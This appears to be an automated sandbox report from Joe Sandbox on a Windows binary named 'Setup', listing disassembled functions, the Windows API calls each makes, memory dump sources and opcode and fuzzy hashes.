VirtualProtect.KERNEL32(00A72000,00000080,00000004,00000000,?,?,0092C0E8,0000001A,AppPolicyGetProcessTerminationMethod,009D0548,AppPolicyGetProcessTerminationMethod,?,?,0092C64C,00000000), ref: 0092BFF6
VirtualProtect.KERNEL32(00A72000,00000080,00000002,00000000,?,?,0092C0E8,0000001A,AppPolicyGetProcessTerminationMethod,009D0548,AppPolicyGetProcessTerminationMethod,?,?,0092C64C,00000000), ref: 0092C01E
FreeLibrary.KERNEL32(00000000,?,?,?,?,0092C0E8,0000001A,AppPolicyGetProcessTerminationMethod,009D0548,AppPolicyGetProcessTerminationMethod,?,?,0092C64C,00000000), ref: 0092C040
GetProcAddress.KERNEL32(00000000,?), ref: 0092C04A

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ProtectVirtual$AddressFreeLibraryProc
String ID:
API String ID: 3998452802-0
Opcode ID: 90bdc148c091a2d710a0fdc767ac7a3c25fa0c021cc8db032605ab0765320c56
Instruction ID: a5ab29a04fa620d4b9a86b050758e26bc70482afe9d6531ff0e667486712569e
Opcode Fuzzy Hash: 90bdc148c091a2d710a0fdc767ac7a3c25fa0c021cc8db032605ab0765320c56
Instruction Fuzzy Hash: 9E21C532604135ABDF319FA8AC45B9A7798EF41770F240226F515A72D4DB60ED01C6E0

Function 00845800 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 239COMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000000,275F26E1,00000000,00000010,00000010), ref: 008459C2

Part of subcall function 00845AA0: GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,?,00000010,00000000,80004005), ref: 00845AAD

Strings

&_', xrefs: 00845817, 0084598F
USERPROFILE, xrefs: 0084585A

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: EnvironmentFolderHeapPathProcessSpecialVariable
String ID: USERPROFILE$&_'
API String ID: 2976596683-1885309458
Opcode ID: ad9f82602def0cb538d4cbfc363de99d8df00c53a39b9e0d425614573ed2016b
Instruction ID: 934e6bbcca96ffe7c6f10383ceb2f48b676ef8e117f88808d6560a2744e0fb02
Opcode Fuzzy Hash: ad9f82602def0cb538d4cbfc363de99d8df00c53a39b9e0d425614573ed2016b
Instruction Fuzzy Hash: 8F71C271A046599FCB04DFA8DC55BAEB7A6FF84320F15426DE816D7382DB70AD00CB91

Function 00890970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 008909C2
EndDialog.USER32(00000000,00000001), ref: 008909D1

Strings

&_', xrefs: 00890987

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: DialogWindow
String ID: &_'
API String ID: 2634769047-2411122644
Opcode ID: 7b75cf4d350771f47cfff602f06933b548cb5a2b16d987e6b58503a7a850e8e8
Instruction ID: f59836fcdb83825b452fd895c795f6bc9b3fa6090dd769e17204eccdcc2cc917
Opcode Fuzzy Hash: 7b75cf4d350771f47cfff602f06933b548cb5a2b16d987e6b58503a7a850e8e8
Instruction Fuzzy Hash: 27617A30A05758DFDB05DFA8C948B58BBE4FF09324F2982A9D855EB391CB749E01CB91

Function 007C6DB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000105), ref: 007C6DF2

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

Part of subcall function 006EA7A0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,0088A498,\\.\pipe\ToServer,?,00000000,?,?,00941D06,000000FF,?,00889991), ref: 006EA7C3

LoadLibraryExW.KERNEL32(?,00000000,00000000,-00000010), ref: 007C6EC9

Strings

&_', xrefs: 007C6DCD

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: DirectoryFindHeapLibraryLoadProcessResourceSystem
String ID: &_'
API String ID: 2891229163-2411122644
Opcode ID: 4bdafae9db8124c579994c006a7ebf9a386137894932b4254a16b4ed0b938d22
Instruction ID: 6a9678c09567662f1376ff336fa7d8d46013a389d4f49526d223ca045d77dfd3
Opcode Fuzzy Hash: 4bdafae9db8124c579994c006a7ebf9a386137894932b4254a16b4ed0b938d22
Instruction Fuzzy Hash: 5D41D375A046099FDB14DFA8DC95FFEB3A5FF44710F14452EE926972C0EB78AA00CA50

Function 0072D270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0072D2A1
std::_Lockit::~_Lockit.LIBCPMT ref: 0072D354

Strings

&_', xrefs: 0072D283

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_dtorLockitLockit::~_
String ID: &_'
API String ID: 3286764726-2411122644
Opcode ID: fc67478f68d2c306aaad9f1de4ea494521dc462febf7b2dcdb1b4c2d01af6a99
Instruction ID: 161fc6c626e1b7cc9d712c838c00aee7402f700513959e3420b095b2857dea7d
Opcode Fuzzy Hash: fc67478f68d2c306aaad9f1de4ea494521dc462febf7b2dcdb1b4c2d01af6a99
Instruction Fuzzy Hash: 872171F5A00748DBEB31DF65E905B4BB7F8AB04704F04456CE44697781E779EA04CB92

Function 0092A1AE Relevance: 5.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,0092A368,?,0091BDB9,?,00000004,?,?,?,?,00927FDC,?,?,00000004,?), ref: 0092A1B1
SetLastError.KERNEL32(00000000,000000FF,?,0091BDB9,?,00000004,?,?,?,?,00927FDC,?,?,00000004,?), ref: 0092A1CB
SetLastError.KERNEL32(00000000,00000000,00000000,?,000000FF,?,0091BDB9,?,00000004,?,?,?,?,00927FDC,?,?), ref: 0092A201

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 027659ccfe2ea1354e1380430f7612479b42f472faf65e6ce037af53a8d59bf6
Instruction ID: 9c3adfb412443992f59b7e8dcc9431f821ab1afd2a755757e048a89853a29273
Opcode Fuzzy Hash: 027659ccfe2ea1354e1380430f7612479b42f472faf65e6ce037af53a8d59bf6
Instruction Fuzzy Hash: 3001B573219230BFEA1237F07C46F7F2A68FFD57B4B100125F510900AEEE564C065192

Function 0082B5C0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,0086E395,000000FF,00000000,00000000,00000000,?,?,0086E395,009D5C9A), ref: 0082B5D8
MultiByteToWideChar.KERNEL32(00000003,00000000,0086E395,000000FF,?,-00000001,?,0086E395,009D5C9A), ref: 0082B60A

Strings

&_', xrefs: 0082B667

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: &_'
API String ID: 626452242-2411122644
Opcode ID: 0725a59333181cf1fa694010b462d7e19ff23c9758fdb1d36c28ab04cb3b5a65
Instruction ID: 8be42a45a3f9e369efcf6a7edd5498f4e8694168ea0f0477c0366a0e4e1bf022
Opcode Fuzzy Hash: 0725a59333181cf1fa694010b462d7e19ff23c9758fdb1d36c28ab04cb3b5a65
Instruction Fuzzy Hash: 4F41ED71A056199FDB14CF99DC85B6AF7A5FF84720F20822EE525E73D0DB30A901CB90

Function 00868E60 Relevance: 4.5, APIs: 3, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00868E69
DestroyWindow.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0098BAD0), ref: 00868E78
IsWindow.USER32(?), ref: 00868EA3

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Window$CurrentDestroyThread
String ID:
API String ID: 2303547079-0
Opcode ID: eac65e3770255cda05db1f7bbea93ffc760f996bc13f94a4118e27b4f33ed24f
Instruction ID: d877ab5ded81f7f21e40ee5665618a7d954ef4895aca092e47c7c9e58abd9799
Opcode Fuzzy Hash: eac65e3770255cda05db1f7bbea93ffc760f996bc13f94a4118e27b4f33ed24f
Instruction Fuzzy Hash: 34F0E230001710CFD3308B28EE0CB52BBD1BF04B00F054A5CE08AC99A0CB71F480CB44

Function 0091EA3E Relevance: 4.5, APIs: 3, Instructions: 14COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0091EA38,?,?,00916862), ref: 0091EA4C
TerminateProcess.KERNEL32(00000000,?,0091EA38,?,?,00916862), ref: 0091EA53
ExitProcess.KERNEL32 ref: 0091EA65

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 35ab10e718796c03883b0d96efddc81cf6cef97eaa5ecee7aefef6463afad398
Instruction ID: 9f960e9e2038d0eb1714194c5b4aab2d794544694afdfb84b12088ec77399eaa
Opcode Fuzzy Hash: 35ab10e718796c03883b0d96efddc81cf6cef97eaa5ecee7aefef6463afad398
Instruction Fuzzy Hash: BCD05232008208BBDB022FA0DC0EB9A7F69EF82300F088010BE2948031CB348AD1EBC0

Function 0088F690 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,275F26E1), ref: 0088F6C4

Strings

&_', xrefs: 0088F6A7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ObjectSingleWait
String ID: &_'
API String ID: 24740636-2411122644
Opcode ID: ae8a6f85b1847929fa524cde20836726c50e221cfd58a2b9d6ac110bbf5e8404
Instruction ID: 819cc9d4ed8dcf47589ca76891b66078e6f30c49cb5e2702a5bf01e9cfce2fdb
Opcode Fuzzy Hash: ae8a6f85b1847929fa524cde20836726c50e221cfd58a2b9d6ac110bbf5e8404
Instruction Fuzzy Hash: 09614975A046058FCB14EFA8C894A6ABBF5FF48310F1541BDEA16DB362DB31E805DB90

Function 00872560 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

EnumResourceLanguagesW.KERNEL32(?,00000010,00000001,008726A0,?), ref: 008725AB

Strings

&_', xrefs: 00872577

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: EnumLanguagesResource
String ID: &_'
API String ID: 4141015960-2411122644
Opcode ID: 8323146e208dda3b1081348264724d49a1fa6949a827644b56ca14b323fe1218
Instruction ID: 8e63f57cd7e7ecf9a383051c39c2c62c078be7ce6b1cc71360be7780aceabb68
Opcode Fuzzy Hash: 8323146e208dda3b1081348264724d49a1fa6949a827644b56ca14b323fe1218
Instruction Fuzzy Hash: 0B41EEB180020A9BCB10DF98C980BDEBBF4FF14318F10416AE815EB391DB75E944CBA1

Function 0083B590 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

std::ios_base::_Addstd.LIBCPMT ref: 0083B642

Strings

&_', xrefs: 0083B5A6

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Addstdstd::ios_base::_
String ID: &_'
API String ID: 2228453158-2411122644
Opcode ID: f1e519868a3447dd9f9732bcad8b581f793c2b0c2f2eab2ab863dde6beede5df
Instruction ID: 7c88901edb35ebec895ef05c2396a4d70aa341f725edde39f37ed429efe4868b
Opcode Fuzzy Hash: f1e519868a3447dd9f9732bcad8b581f793c2b0c2f2eab2ab863dde6beede5df
Instruction Fuzzy Hash: 0C21ACB0600649EFCB20DF58C949B9ABBF4FF88724F10452EE81597781D7B5A914CB81

Function 0088A310 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,?,00000000,275F26E1,00000000,275F26E1), ref: 0088A3A6

Strings

&_', xrefs: 00889ED7, 0088A137, 0088A326

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: FileWrite
String ID: &_'
API String ID: 3934441357-2411122644
Opcode ID: de5342e69be2bca1dd95d191bb276f99f93608713e27b461abce134dd3852b70
Instruction ID: 09b893186435e6f10c92c6838c4dc03c84a8a2f5634a82e9a93d38e4f118eb7d
Opcode Fuzzy Hash: de5342e69be2bca1dd95d191bb276f99f93608713e27b461abce134dd3852b70
Instruction Fuzzy Hash: 80F04F71A14514ABDB10DF69CC45F9AB7ADFF49724F00421AF821E73D0E7B4AD0587A1

Function 006EAF70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00913331: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,00000000,8000000B,275F26E1), ref: 00913391

RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

Strings

&_', xrefs: 006EAFA1

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: AllocateExceptionHeapRaise
String ID: &_'
API String ID: 3789339297-2411122644
Opcode ID: cb7ebc5b7841cefb1931d26338c5e97c3a29660c5ff0f386fce06e3f2c4b6d84
Instruction ID: ab99b5bfa402262a09b2e8187534aebd06197f8e55ba7d2be36b81aeac95c969
Opcode Fuzzy Hash: cb7ebc5b7841cefb1931d26338c5e97c3a29660c5ff0f386fce06e3f2c4b6d84
Instruction Fuzzy Hash: 37F0E2B1608648FFC700CF40CC02F5ABBB8FB04B10F008A2DF81482690DB31A9008A84

Function 00868C60 Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(008685A6), ref: 00868C60
DestroyWindow.USER32(00000000,00000000), ref: 00868D17

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: DestroyErrorLastWindow
String ID:
API String ID: 1182162058-0
Opcode ID: 287f8fd16d40d2964a4bdbe4a462ca3ab921cc961746538f3d57dc2a19c25c3b
Instruction ID: ea6d54dfd32ea0551e0372636621b8cfa78fef7936cf46d4191d592f5157c231
Opcode Fuzzy Hash: 287f8fd16d40d2964a4bdbe4a462ca3ab921cc961746538f3d57dc2a19c25c3b
Instruction Fuzzy Hash: 6721D571610109DBD720AF58EC06BAA7798FB65320F004366FD08C7691DBB6E861DBF1

Function 00889A40 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,275F26E1,?,00000010,?,00000000,00992F13,000000FF,?,0086662C,00000000,00000000,00000000,00000001,?,0000000D), ref: 00889A7A

Strings

&_', xrefs: 00889A54

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CloseHandle
String ID: &_'
API String ID: 2962429428-2411122644
Opcode ID: 19cad218711216599bf356cf5d100ad68e4dd5ea3276105e18d90f7eac7847e2
Instruction ID: 11383264646088fb95a23d9a62ffc659248e5a27ba84669090678a6745f00875
Opcode Fuzzy Hash: 19cad218711216599bf356cf5d100ad68e4dd5ea3276105e18d90f7eac7847e2
Instruction Fuzzy Hash: 6C116D71A046149FDB14CF68DC04B6ABBF8FB45730F14876AE826D37D0D775AA018B80

Function 00848A80 Relevance: 3.0, APIs: 2, Instructions: 39windowCOMMON

Download Yara Rule

APIs

